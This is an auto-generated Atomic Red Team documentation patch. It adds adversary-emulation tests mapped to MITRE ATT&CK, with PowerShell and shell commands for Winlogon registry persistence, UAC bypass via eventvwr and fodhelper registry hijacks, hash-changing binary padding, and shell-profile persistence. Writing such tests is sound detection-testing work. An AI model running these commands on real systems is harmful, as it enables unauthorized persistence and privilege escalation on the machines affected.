From 07079c9ed7732d04d80df0cc724677248ab8a2cd Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 13 Dec 2018 16:06:36 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1004/T1004.md | 76 +++++++++ atomics/T1009/T1009.md | 19 ++- atomics/T1088/T1088.md | 67 ++++++++ atomics/T1156/T1156.md | 31 +++- atomics/index.md | 16 +- atomics/index.yaml | 346 ++++++++++++++++++++++++++++++++------ atomics/linux-index.md | 5 +- atomics/macos-index.md | 5 +- atomics/matrix.md | 2 +- atomics/windows-index.md | 11 +- atomics/windows-matrix.md | 2 +- 11 files changed, 502 insertions(+), 78 deletions(-) create mode 100644 atomics/T1004/T1004.md diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md new file mode 100644 index 00000000..01b4d876 --- /dev/null +++ b/atomics/T1004/T1004.md @@ -0,0 +1,76 @@ +# T1004 - Winlogon Helper DLL +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004) +
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) + +Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) + +* Winlogon\Notify - points to notification package DLLs that handle Winlogon events +* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on +* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on + +Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.
+ +## Atomic Tests + +- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell) + +- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell) + +- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell) + + +
+ +## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell +PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force +``` +
+
+ +## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell +PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force +``` +
+
+ +## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell +PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| + +#### Run it with `powershell`! +``` +New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force +``` +
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index 240c2a60..7e5293c5 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -4,23 +4,26 @@ ## Atomic Tests -- [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash) +- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
-## Atomic Test #1 - Pad Evil Binary to Change Hash -Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution +## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd +Uses dd to add a zero to the binary to change the hash **Supported Platforms:** macOS, Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_pad | Path of binary to be padded | Path | /tmp/EvilBinary| + #### Run it with `sh`! ``` -cp /bin/cat /tmp/evilCat -md5sum /tmp/evilCat -dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat -md5sum /tmp/evilCat -/tmp/evilCat .bash_profile +md5sum #{binary_to_pad} +dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad} +md5sum #{binary_to_pad} ```
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index f97b1f64..c9351291 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -14,6 +14,12 @@ Another bypass is possible through some Lateral Movement techniques if credentia - [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer) +- [Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell](#atomic-test-2---bypass-uac-using-event-viewer---powershell) + +- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper) + +- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell) +
@@ -34,3 +40,64 @@ reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executabl cmd.exe -c eventvwr.msc ```
+
+ +## Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell +PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `command_prompt`! +``` +New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force +Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force +Start-Process "C:\Windows\System32\eventvwr.msc" +``` +
+
+ +## Atomic Test #3 - Bypass UAC using Fodhelper +Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `command_prompt`! +``` +reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f +reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" +fodhelper.exe +``` +
+
+ +## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell +PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force +New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force +Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force +Start-Process "C:\Windows\System32\fodhelper.exe" +``` +
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md index 90600a1f..1d81f042 100644 --- a/atomics/T1156/T1156.md +++ b/atomics/T1156/T1156.md @@ -8,13 +8,15 @@ These files are meant to be written to by the local user to configure their own ## Atomic Tests -- [Atomic Test #1 - .bash_profile and .bashrc](#atomic-test-1---bash_profile-and-bashrc) +- [Atomic Test #1 - Add command to .bash_profile](#atomic-test-1---add-command-to-bash_profile) + +- [Atomic Test #2 - Add command to .bashrc](#atomic-test-2---add-command-to-bashrc)
-## Atomic Test #1 - .bash_profile and .bashrc -xxx +## Atomic Test #1 - Add command to .bash_profile +Adds a command to the .bash_profile file of the current user **Supported Platforms:** macOS, Linux @@ -22,11 +24,28 @@ xxx #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| script | path to script | path | /path/to/script.py| +| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py| #### Run it with `sh`! ``` -echo "#{script}" >> ~/.bash_profile -echo "#{script}" >> ~/.bashrc +echo "#{command_to_add}" >> ~/.bash_profile +``` +
+
+ +## Atomic Test #2 - Add command to .bashrc +Adds a command to the .bashrc file of the current user + +**Supported Platforms:** macOS, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py| + +#### Run it with `sh`! +``` +echo "#{command_to_add}" >> ~/.bashrc ```
diff --git a/atomics/index.md b/atomics/index.md index 93865285..11b6b8af 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -1,7 +1,8 @@ # All Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1015 Accessibility Features](./T1015/T1015.md) - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] @@ -126,7 +127,10 @@ - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - Atomic Test #1: Persistence [windows] - Atomic Test #2: Persistence Cleanup [windows] -- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1004 Winlogon Helper DLL](./T1004/T1004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # defense-evasion - [T1134 Access Token Manipulation](./T1134/T1134.md) 
@@ -136,9 +140,12 @@ - Atomic Test #2: Download & Execute via PowerShell BITS [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - [T1191 CMSTP](./T1191/T1191.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -330,6 +337,9 @@ - Atomic Test #1: Application Shim Installation [windows] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 183f17bc..b1f617e8 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -46,23 +46,40 @@ persistence: created: '2017-12-14T16:46:06.044Z' identifier: T1156 atomic_tests: - - name: ".bash_profile and .bashrc" - description: 'xxx + - name: Add command to .bash_profile + description: 'Adds a command to the .bash_profile file of the current user ' supported_platforms: - macos - linux input_arguments: - script: - description: path to script - type: path + command_to_add: + description: Command to add to the .bash_profile file + type: string default: "/path/to/script.py" executor: name: sh - command: | - echo "#{script}" >> ~/.bash_profile - echo "#{script}" >> ~/.bashrc + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + - name: Add command to .bashrc + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + name: sh + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' T1015: technique: id: attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3 
@@ -347,63 +364,58 @@ persistence: } '': technique: - id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79 + id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Winlogon Helper DLL - description: "Winlogon.exe is a Windows component responsible for actions at - logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish Persistence." + name: Web Shell + description: |- + A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). 
(Citation: Lee 2013) + + Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed. external_references: - - external_id: T1004 - url: https://attack.mitre.org/techniques/T1004 + - external_id: T1100 + url: https://attack.mitre.org/techniques/T1100 source_name: mitre-attack - - external_id: CAPEC-579 - url: https://capec.mitre.org/data/definitions/579.html - source_name: capec - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 + - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html + description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down + the China Chopper Web Shell - Part I. Retrieved March 27, 2015. + source_name: Lee 2013 + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian x_mitre_data_sources: - - Windows Registry + - Anti-virus + - Authentication logs - File monitoring + - Netflow/Enclave netflow - Process monitoring x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. 
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - Administrator + + + Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) + x_mitre_effective_permissions: - SYSTEM + - User x_mitre_platforms: + - Linux - Windows + - macOS + x_mitre_system_requirements: + - Adversary access to Web server with vulnerability or account to upload and + serve the Web shell file. 
type: attack-pattern kill_chain_phases: - phase_name: persistence kill_chain_name: mitre-attack + - phase_name: privilege-escalation + kill_chain_name: mitre-attack modified: '2018-10-17T00:14:20.652Z' - created: '2017-05-31T21:30:20.148Z' + created: '2017-05-31T21:31:13.061Z' atomic_tests: [] T1103: technique: 
@@ -3565,6 +3577,120 @@ persistence: $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject + T1004: + technique: + id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Winlogon Helper DLL + description: "Winlogon.exe is a Windows component responsible for actions at + logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. + Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable + to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish Persistence." + external_references: + - external_id: T1004 + url: https://attack.mitre.org/techniques/T1004 + source_name: mitre-attack + - external_id: CAPEC-579 + url: https://capec.mitre.org/data/definitions/579.html + source_name: capec + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. 
+ source_name: TechNet Autoruns + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_version: '1.0' + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - Windows Registry + - File monitoring + - Process monitoring + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_platforms: + - Windows + type: attack-pattern + kill_chain_phases: + - phase_name: persistence + kill_chain_name: mitre-attack + modified: '2018-10-17T00:14:20.652Z' + created: '2017-05-31T21:30:20.148Z' + identifier: T1004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + description: 'PowerShell code to set Winlogon shell key to execute a binary + at logon along with explorer.exe. 
+ +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + - name: Winlogon Userinit Key Persistence - PowerShell + description: 'PowerShell code to set Winlogon userinit key to execute a binary + at logon along with userinit.exe. + +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + - name: Winlogon Notify Key Logon Persistence - PowerShell + description: 'PowerShell code to set Winlogon Notify key to execute a notification + package DLL at logon. + +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + name: powershell + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force defense-evasion: T1134: technique: 
@@ -3914,22 +4040,24 @@ defense-evasion: created: '2017-05-31T21:30:22.096Z' identifier: T1009 atomic_tests: - - name: Pad Evil Binary to Change Hash - description: 'Copies cat to create an "evil binary" and pads it with a zero - to change the hash without harming execution + - name: Pad Binary to Change Hash - Linux/macOS dd + description: 'Uses dd to add a zero to the binary to change the hash ' supported_platforms: - macos - linux + input_arguments: + binary_to_pad: + description: Path of binary to be padded + type: Path + default: "/tmp/EvilBinary" executor: name: sh command: | - cp /bin/cat /tmp/evilCat - md5sum /tmp/evilCat - dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat - md5sum /tmp/evilCat - /tmp/evilCat .bash_profile + md5sum #{binary_to_pad} + dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad} + md5sum #{binary_to_pad} T1088: technique: id: attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be 
@@ -4044,6 +4172,61 @@ defense-evasion: command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe -c eventvwr.msc + - name: Bypass UAC using Event Viewer - PowerShell + description: 'PowerShell code to bypass User Account Control using Event Viewer + and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + - name: Bypass UAC using Fodhelper + description: 'Bypasses User Account Control using the Windows 10 Features on + Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" + fodhelper.exe + - name: Bypass UAC using Fodhelper - PowerShell + description: 'PowerShell code to bypass User Account Control using the Windows + 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. 
+ +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" T1191: technique: id: attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3 
@@ -9361,6 +9544,61 @@ privilege-escalation: command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe -c eventvwr.msc + - name: Bypass UAC using Event Viewer - PowerShell + description: 'PowerShell code to bypass User Account Control using Event Viewer + and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + - name: Bypass UAC using Fodhelper + description: 'Bypasses User Account Control using the Windows 10 Features on + Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" + fodhelper.exe + - name: Bypass UAC using Fodhelper - PowerShell + description: 'PowerShell code to bypass User Account Control using the Windows + 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. 
+ +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" T1179: technique: id: attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5 diff --git a/atomics/linux-index.md b/atomics/linux-index.md index f52b2c9b..b712ba93 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -1,7 +1,8 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - T1067 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] @@ -130,7 +131,7 @@ # defense-evasion - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1146 Clear Command History](./T1146/T1146.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux, macos] diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 0aa04944..32b1253c 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md 
@@ -1,7 +1,8 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] @@ -190,7 +191,7 @@ # defense-evasion - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1146 Clear Command History](./T1146/T1146.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux, macos] diff --git a/atomics/matrix.md b/atomics/matrix.md index e2f0f6a7..43fd251f 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md 
